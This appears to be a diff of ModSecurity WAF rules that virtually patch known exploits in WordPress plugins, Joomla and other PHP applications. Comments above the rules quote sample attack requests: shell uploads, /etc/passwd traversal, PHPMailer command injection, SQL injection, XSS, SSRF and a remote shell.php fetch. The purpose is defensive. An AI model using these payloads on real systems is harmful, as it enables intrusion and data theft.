+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347160,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
+SecRule ARGS:action "wcp_change" "t:none,t:lowercase,chain"
+SecRule ARGS:width|ARGS:height "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
+
+SecMarker END_PHP_ADMIN_AJAX
+
+#/wp-content/plugins/yuzo-related-post/assets/js/admin.js
+SecRule REQUEST_URI "/wp-content/plugins/yuzo"  "phase:2,deny,log,auditlog,id:382245,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Access attempt or probe for known vulnerable yuzo-related-post Plugin blocked'"
+
+#GET /admin.php?dispatch=auth.login_form&return_url=admin.php
+SecRule REQUEST_URI "admin\.php"  "chain,phase:2,deny,log,auditlog,id:382241,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auth.login_form probe blocked'"
+SecRule ARGS:dispatch "auth\.login_form" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:return_url "^admin\.php$" "t:none,t:urlDecodeUni,t:lowercase"
+
+#GET /admin/index.php?route=common/login
+SecRule REQUEST_URI "index\.php"  "chain,phase:2,deny,log,auditlog,id:382242,rev:4,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auth.login_form probe blocked'"
+SecRule ARGS:route "common/login" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule REQUEST_METHOD "GET" "t:none,chain"
+SecRule REQUEST_HEADERS:Referer "!(\?route=)" "t:none,t:lowercase"
+
+#wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php
+SecRule REQUEST_URI "sf-booking/lib/downloads\.php"  "chain,phase:2,deny,log,auditlog,id:393743,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Service Finder Booking Local File Disclosure blocked'"
+SecRule ARGS:file "/" "t:none,t:urlDecodeUni"
+
+#phpCollab 2.5.1 Unauthenticated File Upload
+SecRule REQUEST_URI "logos_clients/.*\.ph(?:p|tml|t)"  "phase:2,deny,log,auditlog,id:391746,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCollab 2.5.1 Unauthenticated File Upload blocked'"
+
+#status_rrd_graph_img.php?database=queues;
+SecRule REQUEST_URI "status_rrd_graph_img\.php"  "chain,phase:2,deny,log,auditlog,id:391747,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress LearnDash 2.5.3 File Upload'"
+SecRule ARGS:database ";" "t:none,t:urlDecodeUni"
+
+# WP Cherry Plugin Exploit Unrestricted File Upload
+SecRule REQUEST_URI "cherry-plugin/admin/import-export/upload.php"  "chain,phase:2,deny,log,auditlog,id:391756,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Cherry Plugin Unauthenticated File Upload blocked'"
+SecRule REQUEST_METHOD "POST" "t:none"
+
+#wp-content/uploads/assignments/shell.php.
+SecRule REQUEST_URI "wp-content/uploads/assignments/.*\.ph(?:p|tml|t)"  "phase:2,deny,log,auditlog,id:391748,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress LearnDash 2.5.3 File Upload'"
+
+#/components/com_advertisementboard/efiles/[shell].php
+SecRule REQUEST_URI "/components/com_advertisementboard/efiles/.*\.ph(?:p|tml|t)"  "phase:2,deny,log,auditlog,id:391749,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Advertisement board Joomla classifieds extension 3.2.0 - Remote Shell Upload Vulnerability  blocked'"
+
+#GET admin/utilities/elfinder_init?cmd=mkfile&name=shell.php5&target=[dir]
+SecRule REQUEST_URI "admin/utilities/elfinder_init"  "chain,phase:2,deny,log,auditlog,id:391759,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PerfexCRM 1.9.7 a Unrestricted php5 File upload blocked'"
+SecRule ARGS:cmd "mkfile" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:name "ph\.(?:p|tml|t)" "t:none,t:urlDecodeUni,t:lowercase"
+
+#demo/campaign/user-export.php
+#demo/campaign/info.php
+SecRule REQUEST_URI "demo/campaign/(?:user-export|info)\.php"  "phase:2,deny,log,auditlog,id:390747,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Boost My Campaign 1.1 Unauthenticated Administrative Access blocked'"
+
+
+#action=td_ajax_update_panel&wp_option%5Bdefault_role%5D=administrator
+SecRule REQUEST_URI "/wp-admin/admin-ajax\.php"  "chain,capture,phase:2,deny,log,auditlog,id:390769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Theme Newspaper 6.7.1 - Privilege Escalation attack'"
+SecRule ARGS:action "td_ajax_update_panel" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:/wp_option/ "(?:administrator|users_can_register)" "t:none,t:lowercase,t:urlDecodeUni"
+
+
+#payload = ""attacker' -oQ/tmp/ -X%s/phpcode.php  some"@email.com" % RW_DIR
+#payload = '"attacker" -oQ/tmp/ -X%s/phpcode.php  some"@email.com' % RW_DIR
+SecRule ARGS:email|ARGS:from|ARGS:sender|ARGS:name "(?:-oQ ?\.?\.?/|-X.*php)"  "capture,phase:2,deny,log,auditlog,id:390849,rev:2,t:none,t:UrlDecodeUni,t:compressWhiteSpace,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPMailer remote code execution attack'"
+
+#joomla
+#/component/users/?task=user.register
+#form[option]=com_users&user[password1]=password&user[username]=hacker&form[email2]=hacker@example.com&57e059d466318587a8f989565046e656=1&form[password2]=password&user[email2]=hacker@example.com&form[task]=user.register&user[password2]=password&user[name]=hacker&user[email1]=hacker@example.com&user[groups][]=7&form[name]=hacker&user[activation]=0&form[password1]=password&form[username]=hacker&form[email1]=hacker@example.com&user[block]=0
+SecRule REQUEST_URI "/component/users/\?task=user\.register"  "chain,capture,phase:2,deny,log,auditlog,id:390749,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla privilege escalation attack'"
+SecRule ARGS:form[option] "com_users" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:user[groups][] "7" "t:none,t:urlDecodeUni"
+
+
+
+#Vuln vulnerable joomla plugin
+SecRule REQUEST_URI "modules/mod_simplefileuploadv1\.3"  "phase:2,deny,log,auditlog,id:390746,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known Vulnerable Joomla Simple File Upload v1.3 Access blocked'"
+
+#known malware
+#A.php?username=himel_site&db=himel_base&edit=jos_users&where%5Bid%5D=62
+SecRule &ARGS:username "@eq 1"  "chain,capture,phase:2,deny,log,auditlog,id:390745,rev:1,t:none,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known PHP malware'"
+SecRule &ARGS:db "@eq 1" "t:none,chain"
+SecRule ARGS:edit "(?:jos_users|insp_users)" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule &ARGS:where[id] "@eq 1" "t:none"
+
+
+#http://localhost/path//administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
+SecRule REQUEST_URI "quixplorer" "chain,capture,phase:2,deny,log,auditlog,id:390744,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla com aceftp Arbitrary File Download Vulnerability'"
+SecRule ARGS:action "download" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:item "configuration\.php" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule REQUEST_URI "/(?:upload|sugarrestserialize)\.php" "chain,capture,phase:2,deny,log,auditlog,id:391744,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SugarCRM PHP Code injection attack'"
+SecRule ARGS:/ext_rest_insideview/|ARGS:rest_data "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|base64_decode|decode_base64|rot13|base64_url_decode)\b ?(?:\(|\:)|\b(?:system|include)\b ?\((?:\'|\"|\$))"  "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+
+SecRule REQUEST_URI "/index\.php" "chain,capture,phase:2,deny,log,auditlog,id:391745,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SugarCRM Insecure fopen attack'"
+SecRule ARGS:type_module "expect\://" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+
+#/movefile.php
+SecRule REQUEST_URI "/movefile\.php" "chain,capture,phase:2,deny,log,auditlog,id:391741,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Roxy File Manager Shell Upload Attack'"
+SecRule ARGS:n "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase"
+
+
+#ehcpbackup.php
+SecRule REQUEST_URI "/ehcpbackup.php" "capture,phase:2,deny,log,auditlog,id:391739,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Easy Hosting Control Panel plaintext password attack denied'"
+
+#/wp-content/plugins/wp-mobile-detector/resize.php?src=.*php
+SecRule REQUEST_URI "/wp-content/plugins/wp-mobile-detector/resize\.php" "chain,capture,phase:2,deny,log,auditlog,id:391740,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  WordPress WP Mobile Detector 3.5 Shell Upload'"
+SecRule ARGS:src "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase"
+
+#ehcp/test/up2.php
+#http://<IP>/ehcp/test/upload2.php
+#http://<IP>/ehcp/test/upload.php
+#http://<IP>/ehcp/test/up.php
+SecRule REQUEST_URI "/ehcp/test/up" "capture,phase:2,deny,log,auditlog,id:391709,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Easy Hosting Control Panel Unauthenticated File upload attack denied'"
+
+#http://localhost/pivotx_latest/pivotx/
+#index.php?page=media&file=imageshell.png&pivotxsession=ovyyn4ob2jc5ym92&answer=
+#shell.php
+SecRule REQUEST_URI "/pivotx/" "chain,capture,phase:2,deny,log,auditlog,id:393739,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  PivotX shell upload attack denied'"
+SecRule ARGS:answer "\.php" "t:none,t:urlDecodeUni,t:lowercase"
+
+#admin-logs.php
+SecRule REQUEST_URI "/admin-logs.php" "chain,capture,phase:2,deny,log,auditlog,id:393738,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Zenphoto RFI attack denied'"
+SecRule ARGS:tab "^(?:ogg|tls|gopher|data|php|glob|phar|dict|ssh2|rar|expect|zip|zlib|(?:ht|f)tps?):/"
+
+#/php-utility-belt/ajax.php
+SecRule REQUEST_URI "/php-utility-belt/ajax\.php" "capture,phase:2,deny,log,auditlog,id:393737,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  PHP utility belt access denied'"
+
+#ui/js/3rd/plupload/examples/upload.php
+SecRule REQUEST_URI "ui/js/3rd/plupload/examples/upload\.php" "capture,phase:2,deny,log,auditlog,id:393734,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Yeager CMS unauthenticated upload blocked'"
+
+#libs/org/adodb_lite/tests/
+SecRule REQUEST_URI "libs/org/adodb_lite/tests/" "chain,capture,phase:2,deny,log,auditlog,id:393721,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Yeager CMS SSRF attack blocked '"
+SecRule ARGS:dbhost "^(?:127|10|172\.16|192)\."  "t:none"
+
+#/_admin/site.link-list.php
+SecRule REQUEST_URI "_admin/site\.link-list\.php" "chain,capture,phase:2,deny,log,auditlog,id:393720,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Grawlix 1.0.3: Code Execution '"
+SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)$"  "t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace"
+
+## multipart/form-data name evasion attempts
+SecRule REQUEST_URI "kcfinder/browse\.php\?type=image" "chain,capture,phase:2,deny,log,auditlog,id:393719,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CouchCMS 1.4.5: Code Execution attack blocked'"
+SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)$"  "t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace"
+
+#/main_bigware_43.php/main_bigware_79.php
+SecRule REQUEST_URI "/main_bigware_[0-9]+\.php/main_bigware_[0-9]+\.php" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:364577,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Bigware Shop 2.3.01 File Upload Attack blocked'"
+
+#/web/download_file.php?file=../../app/etc/local.xml
+SecRule REQUEST_FILENAME "web/download_file\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344577,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Magmi file recursion attack '"
+SecRule ARGS:file "\.\./\.\./" "t:none,t:urlDecodeUni"
+
+#/files/attach/attachement_6/backdoor.php5
+SecRule REQUEST_FILENAME "/files/attach/attachement.*/.*\.php" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjeQtor 4.5.2 Shell Upload attack'"
+
+#persistant=*'"`
+SecRule REQUEST_FILENAME "/main\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Centreon 2.6.1 Command Injection Vulnerability attack'"
+SecRule ARGS:persistant "\'\"\`" "t:none,t:urlDecodeUni"
+
+#/avatar/image_name /.*php2345
+SecRule REQUEST_FILENAME "/avatar/image_name/.*\.ph(?:p|tml|t)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Collabtive 2.0 Shell Upload attack'"
+
+#img/media/.*/.*.php
+#SecRule REQUEST_FILENAME "/img/media/.*/.*\.ph(?:p|t|tml)"  "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343480,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Centreon 2.6.1 Unrestricted File Upload Vulnerability attack'"
+
+#/test/logo/.*php
+SecRule REQUEST_FILENAME "/test/logo/.*\.ph(?:p|t|tml)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343481,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vtiger CRM 6.3 Remote Code Execution attack'"
+
+#/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%22%3Ealert(%27xss%27)%3C/script%3E%3Cscript%20src=%22
+SecRule REQUEST_FILENAME "js/window\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin Navis Documentcloud XSS Vulnerability attack'"
+SecRule ARGS:wpbase "(?:script|\" ?>)" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+
+SecRule REQUEST_URI "/pluck/" "id:335895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:349303,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_PLUCK"
+
+SecRule REQUEST_FILENAME "pluck/admin\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pluck remote code injection attack '"
+SecRule ARGS:action "files"  "chain,t:none,t:lowercase"
+Secrule REQUEST_BODY "php" "t:none,t:lowercase"
+
+#files/phpinfo.php5
+SecRule REQUEST_FILENAME "pluck/files/phpinfo\.php5" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pluck recon phpinfon attack '"
+
+SecMarker END_PHP_JITP_PLUCK
+
+#wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
+#version() ; --
+SecRule REQUEST_FILENAME "get_album_item\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability attack'"
+SecRule ARGS:size "(?:version|--| )" "t:none,t:urlDecodeUni,t:lowercase"
+
+#WordPress WP Symposium Plugin 15.1 - Blind SQL Injection
+SecRule REQUEST_FILENAME "forum_functions\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability attack'"
+SecRule ARGS:topic_id "(?:sleep|select|\(| )" "t:none,t:urlDecodeUni,t:lowercase"
+
+
+#avatarurl=http://localhost:11211
+#profile.php
+SecRule REQUEST_FILENAME "profile\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin Memcache Remote Code Execution Attack'"
+SecRule ARGS:avatarurl "https?\://(?:localhost|127\.)" "t:none,t:urlDecodeUni,t:lowercase"
+
+#Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution
+SecRule REQUEST_FILENAME "/userfiles/media/[a-z]+/uploaded/*\.php" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337472,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution attempt'"
+
+#These really asrent necessary, the generic rules already stop these
+#WordPress WPTF Image Gallery 1.03 File Download
+#/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
+#Remote file download in simple-image-manipulator v1.0 wordpress plugin
+#/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"
+#/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd
+#/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
+SecRule REQUEST_FILENAME "(?:wptf-image-gallery/lib-mbox/ajax_load\.php|simple-image-manipulator/controller/download\.php|recent-backups/download-file\.php|candidate-application-form/downloadpdffile\.php)" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,id:337473,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic wordpress plugins Upload Filter Bypass Remote file access attempt'"
+SecRule ARGS:url|ARGS:filename|ARGS:file_link|ARGS:filepath "/(?:etc|home|var|root|usr)/" "t:none,t:urlDecodeUni,t:lowercase"
+
+#WordPress Fast Image Adder 1.1 Shell Upload
+#/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://192.168.0.2/shell.php
+SecRule REQUEST_FILENAME "/plugins/fast-image-adder/fast-image-adder-uploader\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,id:337474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Fast Image Adder 1.1 Shell Upload attack'"
+SecRule ARGS:url "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+#https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe
+SecRule REQUEST_FILENAME "/index\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Fast Image Adder 1.1 Shell Upload attack'"
+SecRule &ARGS:Action "@eq 1" "t:none,chain"
+SecRule ARGS:current_dir "^[a-z]\:"  "chain,t:none,t:urlDecodeUni,t:lowercase"
+SecRule ARGS:cmd "\.exe$" "t:none,t:urlDecodeUni,t:cmdLine"
+
+#admin-ajax.php attacks
+SecRule REQUEST_URI "/uploadify\.php" "id:335867,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:349313,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_UPLOADIFY"
+
+#folder=%2fwordpress%2fwp%2dcontent%2fplugins%2fwp%2dproperty%2fthird%2dparty%2fuploadify%2f
+#folder=/wordpress/wp-content/plugins/wp-property/third-party/uploadify/
+#wp-content/plugins/barclaycart/uploadify
+SecRule REQUEST_URI "/uploadify\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337470,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress uploadify upload Attack'"
+SecRule ARGS:folder "/wp-content/.*/uploadify/" "t:none,t:urlDecodeUni,t:lowercase"
+
+#Block anything thats not jpg,jpeg,gif,png,mpg,mpeg,flv
+SecRule REQUEST_URI "/uploadify\.php" "capture,phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337471,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: uploadify non-media file upload violation',logdata:'%{TX.0}'"
+SecRule ARGS:Filename|ARGS:Filedata "!((?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df|s)|gif|ico|avi|w(?:mv|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule REQUEST_URI "/uploadify\.php" "capture,phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337476,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: uploadify RFI attack blocked',logdata:'%{TX.0}'"
+SecRule ARGS:src  "^(?:ogg|tls|gopher|data|php|glob|phar|dict|ssh2|rar|expect|zip|zlib|(?:ht|f)tps?):/" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecMarker END_PHP_JITP_UPLOADIFY
+
+SecRule REQUEST_URI "wp-admin/(?:index|admin-ajax)\.php" "chain,capture,phase:2,deny,log,auditlog,id:393726,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Wordpress WooCommerce Privilege Escalation'"
+SecRule ARGS:action "nuke"  "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:/woo_st/ "1"  "t:none,t:urlDecodeUni,t:lowercase"
+#action=nuke&woo_st_products=1
+
+
+#admin-ajax.php attacks
+SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "id:335865,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:349300,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_ADMIN_AJAX1"
+
+#/wordpress/wp-admin/admin-ajax.php
+#action=wpuf_file_upload
+SecRule ARGS:action "wpuf_file_upload"  "capture,phase:2,deny,log,auditlog,id:393725,rev:1,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Wordpress WP User Frontend Plugin Unrestricted File Upload blocked'"
+
+#Just the silly test case, in case someone panics that the POC "worked"
+#wp-admin/admin-ajax.php\?action=umm_switch_action &umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP"
+SecRule REQUEST_URI "wp-admin/admin-ajax\.php" "chain,capture,phase:2,deny,log,auditlog,id:393723,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Wordpress Blind SQLi POC blocked'"
+SecRule ARGS:umm_user "(?:sleep|\b(?:select|union) )"  "t:none,t:urlDecodeUni,t:lowercase,t:removecomments"
+
+SecRule ARGS:umm_sub_action "umm_get_csv" "capture,phase:2,deny,log,auditlog,id:393727,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress User Meta Manager Plugin Information Disclosure attack blocked'"
+
+SecRule ARGS:umm_sub_action "umm_backup" "chain,capture,phase:2,deny,log,auditlog,id:393728,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress User Meta Manager Plugin Information Disclosure attack blocked'"
+SecRule ARGS:mode "sql" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule REQUEST_URI "wp-admin/admin-ajax\.php" "chain,capture,phase:2,deny,log,auditlog,id:393724,rev:1,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Wordpress Privilege Escalation attack blocked'"
+SecRule ARGS:umm_meta_value "administrator"  "t:none,t:urlDecodeUni,t:lowercase"
+
+#new revslider vuln
+#/wp-admin/admin-ajax.php
+#action=revslider%5fajax%5faction&client%5faction=update%5fplugin
+#action=revslider_ajax_action&client_action=update_plugin
+#action=revolution-slider_ajax_action&client_action=update_plugin
+#Cookie:
+#/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
+SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337469,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Revslider upload Attack'"
+SecRule ARGS:action "(?:revslider_ajax_action|revolution-slider_ajax_action)" "chain,t:none,t:urlDecodeUni,t:lowercase"
+SecRule ARGS:client_action "(?:update_plugin|get_captions_css)" "chain,t:none,t:urlDecodeUni,t:lowercase"
+SecRule &ARGS:nonce "@eq 0"
+
+#/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
+SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337479,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Revslider non-image file download Attack'"
+SecRule ARGS:action "revslider_show_image" "chain,t:none,t:urlDecodeUni,t:lowercase"
+SecRule ARGS:img "\.php" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecMarker END_PHP_JITP_ADMIN_AJAX1
+
+#Wordpress XSS
+SecRule REQUEST_URI "/wp-comments-post.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,capture,id:336469,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Stored XSS Attack',logdata:'%{TX.0}'"
